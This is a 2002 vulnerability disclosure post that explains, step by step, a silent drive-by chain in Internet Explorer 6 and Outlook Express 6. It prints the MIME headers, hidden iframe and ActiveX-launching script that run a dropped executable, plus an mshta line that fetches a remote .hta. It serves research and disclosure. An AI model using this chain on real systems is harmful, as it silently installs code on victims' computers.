HELP.dropper: IE6, OE6, Outlook...lookOut

["http-equiv () excite com" <http-equiv () malware com>]

Thursday, 28 March, 2002

Silent delivery and installation of an executable on a target 
computer. No client input other than opening an email or newsgroup 
post or web site. This can be accomplished with the default 
installation of Internet Explorer 6.0, Outlook Express 6.0 and 
probably Outlook and Outlook 2002 and whatever other Outlook's there 
are. Default settings for Outlook Express and Outlook: restricted 
zone.

This is by no means trivial.

The Key:

Internet explorer and accompanying mail and news clients divert all 
external files into the Temporary Internet File (TIF) which is 
controlled by the various security settings of the browser. If we can 
strategically place our named files inside the TIF and determine 
their exact location, we are in business.

How Do We Do That:

Recent bandages applied to Internet Explorer currently transfer files 
from mail and news to the TIF without given names and with a TMP 
extension. Technically the mail client is able to determine the 
contents of these *.TMP files through the Content-ID protocol 
(cid:malware) whether the file is a sound file, html file, image file 
etc. and based on the contents coupled with the given Content-Type: 
image/gif render or parse accordingly.

Through trivial html we are able to restore our given file names and 
dictate where our files are to be placed inside the TIF.

Content-Type: audio/x-ms-wma;
 name="malware.wma"
Content-Transfer-Encoding: base64
Content-ID: <mrs.malware>
Content-Location: file:///malware.wma

In order to ensure all our files end up in the same folder within the 
TIF, we encapsulate the entire "package" in MIME base64 so that as 
the self-contained mail message is opened within a particular folder 
in the TIF, so all the required files are transferred instantly and 
silently into that same particular folder.

[screen shot: http://www.malware.com/ca$h.png 11KB]

And:

Now that we have our named files in our known location inside the 
TIF, we need to access them to trigger off the entire event. We 
utilise the multi-purpose Windows Media Player and its assortment of 
files. We create a very simple media file with 0s URL flip and point 
that to our named file in our known location.

 <iframe src="cid:mrs.malware" style="display:none">

Content-Type: audio/x-ms-wma;
 name="malware.wma"
Content-Transfer-Encoding: base64
Content-ID: <mrs.malware>
Content-Location: file:///malware.wma

Our named file it points to is a very simple *.html file comprising 
our scripting to determine the location  like so:

malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf("\\"));
path=unescape(path);

With this information, we utilise an existing possibility to call our 
named *.chm file which has been delivered to the TIF along with our 
primary message and open it. Inside our *.chm we include a more 
sophisticated scripting to determine yet again the location of our 
third file, our *.exe which has also been delivered along with our 
primary message:

var malware="malware[1].exe";
document.writeln('<OBJECT id=AA classid="clsid:adb880a6-d8ff-11cf-
9377-00aa003b7a11" width=10 height=10>');
document.writeln('<PARAM name="Command" value="ShortCut">');
document.writeln('  <PARAM name="Item1" 
value=",'+cool.path+malware+',">');
document.writeln('</OBJECT>');
setTimeout("AA.Click();",3000);  

[screen shot: http://www.malware.com/ca$h.png 11KB]

This inturn fires our *.exe that we have dropped into the TIF.

Critical Note: it is imperative that our media file is delivered to 
the TIF and opened from within the TIF through MIME encapsulation. 
Without out this the URL filp when triggered will expect to find the 
referenced file name on the server.

Repeat:

1. Our mail message or news post containing our 4 critical files 
[*.html, *.chm, *.wma, *.exe] is fired off to the unsuspecting 
recipient.

2. Upon opening the mail or news message, all embedded files are 
instantly transferred to the TIF with our given file names. Note: 
this is in addition to the exact same files transferred in accordance 
with security as *.TMP files. Our 0s media file is then automatically 
opened by our iframe. This inturn launches the Windows Media Player 
which immediately URL flips to our named *.html file. Obviously, 
because the media file resides in the same folder inside the TIF as 
our *.html file, it will call the *.html file.

3. Our *.html file is then opened in a new browser window along with 
the full path name of its location. Our scripting to determine the 
location and write it inside our *.html is fired. This inturn calls 
our *.chm file which is opened.

4. Our *.chm file is opened and our sophisticated scripting to 
determine the location inside that, then calls our *.exe which also 
resides in the same folder inside the TIF:

[screen shot: http://www.malware.com/ca$h.png 11KB]

BANG!

The above represents by far the most successful method to achieve 
this. Primarily because we can (a) dictate our file names and (b) 
ensure all necessary files are transferred to the same folder within 
the TIF.

In the case of Outlook Express default settings and Outlook default 
settings, where no scripting and no activex is allowed. We can 
achieve similar results substituting our method of file transference 
in the above, with a less than robust method. Simply put:

a) embedded media file in iframe -- automatically opened from with in 
the TIF -- no scripting
b) generic html tags <img src=malware.html...<bgsound src=*.chm...etc 
will deposit our required files inside the TIF-- no scripting but not 
always in the same folder. To do this we need to draw the files 
remotely from a server in order to ensure they are transferred with 
given file names. 5 out of 10 times we can achieve success but in 
typical fashion the Internet Explorer 6 browser under unidentifiable 
conditions (at whim), can transfer each file into different folders 
inside the TIF.

In the case of Internet Explorer 6 simply converting our mail or news 
message to *.mhtml format and in particular our first scenario above 
where all files are embedded, results in 99.999% success. Obviously 
that 1% being the most important, and that is launching the Windows 
Media Player in order to invoke our URL flip. No matter how examined, 
despite all necessary files with file names being in the known 
location, it simply refuses interpret the path to the media 
file.Without a doubt a solution is out there but we are out of time.

Working Examples:

Tested on fully patched Internet Explorer 6 and Outlook Express 6 on 
win98

NOTE: all have about a 20 second delay

1. All files fully embedded in the mail message. Open in mail client 
in internet zone:

Includes harmless *.exe

http://www.malware.com/oxpress.zip

note: there can be a possibility that the resulting file name after 
transference differs from OS to OS. 

2. Media file fully embedded, all other files remotely retrieved. 
Open in mail client in restricted zone.

Includes harmless *.exe

http://www.malware.com/outlook.zip

note 1: there is a great possibility that the resulting transference 
is to different folders within the TIF. 
note  2: this is definitely not fool proof but by decreasing the 
amount of required files i.e. only *.chm and *.html with 
incorporation of the previous:

C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta 

link we can leave out the *.exe as it would appear that the more 
files transferred the more chances are different folders inside the 
TIF are used.

3. For Internet Explorer 6, simply convert 1 above to *.mhtml format 
and give it a whack. Perhaps some bright spark knows how to remedy 
this one. Good Luck !

4. For the very few interested, we managed to compile an *.hta file 
into a *.chm as well as a RFC822 mail message. Behaviour results in 
the same as IE6. Nothing spectacular. Technically interesting results:

http://www.malware.com/chm.zip


End Call

-- 
http://www.malware.com